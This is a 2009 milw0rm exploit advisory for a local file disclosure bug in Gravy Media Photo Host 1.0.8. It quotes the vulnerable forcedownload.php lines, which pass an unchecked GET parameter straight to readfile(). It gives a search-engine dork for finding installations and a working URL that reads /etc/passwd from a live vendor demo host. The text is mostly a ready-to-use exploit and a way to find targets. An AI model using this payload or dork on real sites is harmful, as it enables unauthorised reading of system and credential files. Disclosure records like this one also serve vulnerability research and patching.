Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:`Powered by Gravy Media`
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile(`$filename`);
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]